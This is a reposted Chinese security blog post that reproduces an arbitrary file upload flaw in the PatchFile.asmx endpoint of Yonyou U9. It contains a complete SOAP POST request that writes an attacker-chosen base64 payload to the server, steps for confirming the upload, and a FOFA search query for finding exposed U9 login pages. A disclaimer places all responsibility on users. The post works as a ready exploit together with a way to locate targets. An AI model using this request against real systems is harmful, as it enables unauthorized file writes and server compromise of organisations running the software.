2024年2月5日13:58:22评论78 views字数 812阅读2分42秒阅读模式

免责声明

该公众号主要是分享互联网上公开的一些漏洞poc和工具，利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，本公众号及作者不为此承担任何责任，一旦造成后果请自行承担！如果本公众号分享导致的侵权行为请告知，我们会立即删除并道歉。

【新】用友U9 PatchFile.asmx接口任意文件上传漏洞复现

漏洞影响范围

【新】用友U9 PatchFile.asmx接口任意文件上传漏洞复现

漏洞复现

poc

POST /CS/Office/AutoUpdates/PatchFile.asmx HTTP/1.1Host: xx.xx.xx.xxContent-Type: text/xml; charset=utf-8Content-Length: 418SOAPAction: "http://tempuri.org/SaveFile"<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">  <soap:Body>    <SaveFile xmlns="http://tempuri.org/">      <binData>{base64编码payload}</binData>      <path>./</path>      <fileName>12342424.txt</fileName>    </SaveFile>  </soap:Body></soap:Envelope>

漏洞复现

出现如下数据代表漏洞存在

【新】用友U9 PatchFile.asmx接口任意文件上传漏洞复现

2.访问上传文件url+/CS/Office/AutoUpdates/12342424.txt

【新】用友U9 PatchFile.asmx接口任意文件上传漏洞复现

搜索语法

fofa：title="U9-登录"

原文始发于微信公众号（小白菜安全）：【新】用友U9 PatchFile.asmx接口任意文件上传漏洞复现

左青龙
微信扫一扫

右白虎
微信扫一扫

【新】用友U9 PatchFile.asmx接口任意文件上传漏洞复现

漏洞复现

搜索语法

Craft CMS 远程代码执行漏洞复现（附nuclei POC）

漏洞预警 | Google Chrome堆缓冲区溢出漏洞

漏洞预警 | GeoNode请求伪造漏洞

漏洞预警 | Docker Desktop增强容器隔离限制绕过漏洞

漏洞预警 | D-Link D-View 8 硬编码密钥漏洞

(CVE-2023-30591) NodeBB 预身份验证拒绝服务

CVE-2023-41081：Apache Tomcat 连接器中的高严重性漏洞

禅道项目管理系统身份认证绕过[漏洞复现]

LiveGBS-save-任意用户添加漏洞复现

禅道身份认证绕过漏洞QVD-2024-15263

发表评论

在线咨询

微信